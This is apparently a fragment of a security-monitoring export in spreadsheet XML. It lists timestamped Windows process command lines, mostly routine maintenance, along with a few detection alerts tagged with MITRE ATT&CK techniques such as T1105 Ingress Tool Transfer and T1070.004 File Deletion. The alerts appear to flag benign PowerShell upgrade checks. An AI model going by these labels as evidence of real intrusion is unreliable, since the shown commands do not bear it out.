    <t>May 9, 2025 @ 13:30:41.518</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:41.519</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:41.520</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=renderer --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags=\"--expose-gc --ms-user-locale=\" --time-ticks-at-unix-epoch=-1746793375464371 --launch-time-ticks=466385437 --always-read-main-dll --field-trial-handle=1764,i,12846873438858661319,4125065856273407885,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=3744 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:45.152</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:45.187</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:45.188</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:45.194</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:48.410</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:48.451</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:48.478</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:48.494</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:48.504</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:48.518</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:48.529</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:49.647</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:49.649</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:50.196</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:53.661</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:54.337</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:54.385</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:54.413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</si>
  <si>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--renderer-client-id=24 --time-ticks-at-unix-epoch=-1746793237350476 --launch-time-ticks=619540842 --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=6188 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:56.029</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:30:57.334</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=6868 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:01.385</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:03.898</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:04.728</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:Jl/THqEAeEeD82Dt.0.1 -wce:0000000000000210  -m:appraiser.dll -f:DoScheduledTelemetryRun</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:10.226</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:10.241</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:12.242</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:19.177</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:19.210</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:19.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:19.247</t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Restricted -Command                      $Res = 0                     [UInt64]$MinDiskSpaceThreshold = 20 * 1024 * 1024 * 1024                      try {                         $SystemDrive = (Get-CimInstance Win32_OperatingSystem).SystemDrive                         $SystemDriveLetter = $SystemDrive[0]                         $SystemDriveSpace = (Get-Volume -DriveLetter $SystemDriveLetter).SizeRemaining                         Write-Host 'Current system drive space:', $SystemDriveSpace.ToString('N0')                         if ($SystemDriveSpace -lt $MinDiskSpaceThreshold) {                             Write-Host 'System drive space is less than the threshold:', $MinDiskSpaceThreshold.ToString('N0'), 'Block Upgrade.'                             $Res = 1                         }                     } catch {                         # Do nothing                     }                      Write-Host 'Final result:', $Res</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:19.256</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:19.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:19.289</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:22.183</t>
  </si>
  <si>
    <t>Powershell process created an executable file in Windows root folder</t>
  </si>
  <si>
    <t>[T1105]</t>
  </si>
  <si>
    <t>[Command and Control]</t>
  </si>
  <si>
    <t>[Ingress Tool Transfer]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:26.126</t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Restricted -Command                      $Res = 0                     [UInt64]$MinDiskSpaceThreshold = 25 * 1024 * 1024 * 1024                      try {                         $SystemDrive = (Get-CimInstance Win32_OperatingSystem).SystemDrive                         $SystemDriveLetter = $SystemDrive[0]                         $SystemDriveSpace = (Get-Volume -DriveLetter $SystemDriveLetter).SizeRemaining                         Write-Host 'Current system drive space:', $SystemDriveSpace.ToString('N0')                         if ($SystemDriveSpace -lt $MinDiskSpaceThreshold) {                             Write-Host 'System drive space is less than the threshold:', $MinDiskSpaceThreshold.ToString('N0'), 'Applying safeguard.'                             $Res = 1                         }                     } catch {                         # Do nothing                     }                      Write-Host 'Final result:', $Res</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:26.173</t>
  </si>
  <si>
    <t>Powershell was used to delete files or directories</t>
  </si>
  <si>
    <t>[T1070.004]</t>
  </si>
  <si>
    <t>[File Deletion]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:26.190</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:26.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:32.702</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:32.845</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:32.938</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:39.153</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:39.155</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:39.218</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:39.219</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:39.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:39.582</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:40.902</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k smphost</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:42.248</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:42.287</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:42.288</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:43.674</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:43.706</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:43.756</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:48.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:48.575</t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:48.606</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:48.607</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:54.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:54.473</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:31:54.503</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:00.633</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:00.634</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:00.690</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:00.718</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:04.869</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:04.939</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:04.972</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:05.028</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:06.001</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:06.051</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:06.142</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:07.541</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:07.588</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:07.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:09.729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</si>
  <si>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--field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=6436 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:13.380</t>
  </si>
  <si>
    <t>powershell.exe -ExecutionPolicy Restricted -Command  $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\\inf\\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\\[defaultinstall.nt(amd64|arm|arm64|x86)\\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:13.387</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:13.492</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:13.493</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:21.721</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:23.222</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:23.232</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:26.549</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:49.177</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:51.536</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:51.561</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:32:57.451</t>
  </si>
  <si>
    <t>Microsoft-Windows-PowerShell/Operational</t>
  </si>
  <si>
    <t>Powershell executed "Get-Item -Path". Script trying to see files in path</t>
  </si>
  <si>
    <t>[T1083]</t>
  </si>
  <si>
    <t>[File and Directory Discovery]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:36.553</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:36.591</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:39.908</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:57.150</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:57.173</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:57.247</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:58.525</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:58.528</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:33:58.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:34:53.222</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\ProvTool.exe\" /turn 5 /source LogonIdleTask</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:34:53.328</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\speech_onecore\\common\\SpeechModelDownload.exe\"</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\UCPDMgr.exe\"</t>
  </si>
  <si>
    <t>taskhostw.exe -IntegrityCheck</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:34:53.329</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:34:53.350</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:01.377</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\defrag.exe\" -p 4c8 -s 0000000000000BD4 -b -OnlyPreferred C:</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:01.383</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:01.389</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:01.399</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k defragsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:07.269</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:07.289</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:07.342</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:09.292</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:09.299</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:09.305</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:09.310</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:37.329</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:37.369</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:37.370</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:37.387</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:37.423</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:39.599</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:39.647</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:46.421</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\defrag.exe\" -p 47c -s 0000000000000BEC -b -OnlyPreferred C:</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:46.432</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:46.437</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:46.449</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:53.888</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\tzsync.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:53.931</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\la57setup.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:53.949</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:53.961</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:53.993</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\usoclient.exe\" ReportPolicies</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.005</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.022</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\defrag.exe\" -c -h -o -$</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.040</t>
  </si>
  <si>
    <t>Executable file dropped in folder commonly used by malware</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\lpremove.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.041</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.042</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.087</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\rundll32.exe\" Windows.Storage.ApplicationData.dll,CleanupTemporaryState</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.088</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\disksnapshot.exe\" -z</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.089</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.090</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.091</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\dstokenclean.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.123</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\dmclient.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.152</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\sc.exe\" start w32time task_started</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.185</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\rundll32.exe\" C:\\WINDOWS\\system32\\CapabilityAccessManager.dll,CapabilityAccessManagerDoStoreMaintenance</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.186</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.192</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\rundll32.exe\" C:\\WINDOWS\\system32\\Windows.StateRepositoryClient.dll,StateRepositoryDoMaintenanceTasks</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.194</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" -IdleTask -TaskName WdCacheMaintenance</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.226</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\rundll32.exe\" Startupscan.dll,SusRunTask</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.296</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:54.332</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" Scan -ScheduleJob -ScanTrigger 55 -IdleScheduledJob</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:55.108</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\sdiagnhost.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:55.129</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:55.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:56.165</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:56.223</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.335</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.336</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.340</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.382</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.712</t>
  </si>
  <si>
    <t>The database engine is starting a new instance.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.820</t>
  </si>
  <si>
    <t>The database engine is initiating recovery steps.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.891</t>
  </si>
  <si>
    <t>The database engine is replaying log file C:\Winnt\system32\wins\j50.log.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:57.948</t>
  </si>
  <si>
    <t>The database engine has completed recovery steps.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:58.123</t>
  </si>
  <si>
    <t>The database engine attached a database.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:59.613</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:35:59.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:00.163</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware scan started</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:02.837</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:08.612</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:688</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:08.624</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:220</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:08.631</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:08.645</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:10.760</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:13.952</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\" RemoveTaskDelayStartTrigger /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:15.309</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\" ExecuteQueuedItems /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:18.418</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:23.915</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\cleanmgr.exe\" /autocleanstoragesense /d C:</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:27.894</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:30.445</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 1f8 -InterruptEvent 0 -NGENProcess 198 -Pipe 1ec -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:32.047</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\" RemoveTaskDelayStartTrigger /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:32.072</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\" ExecuteQueuedItems /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:33.165</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:34.123</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:34.153</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:34.159</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:34.162</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:34.194</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:35.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:35.488</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:35.514</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:36.379</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:36.419</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 23c -InterruptEvent 0 -NGENProcess 224 -Pipe 238 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:36.545</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:36.564</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:36.565</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:38.027</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:38.342</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /StopEvent:1340</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:38.366</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:40.064</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:41.373</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:42.612</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /StopEvent:1460</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:42.654</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:43.753</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\devicecensus.exe\" UserCxt</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:50.410</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:36:50.423</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:01.407</t>
  </si>
  <si>
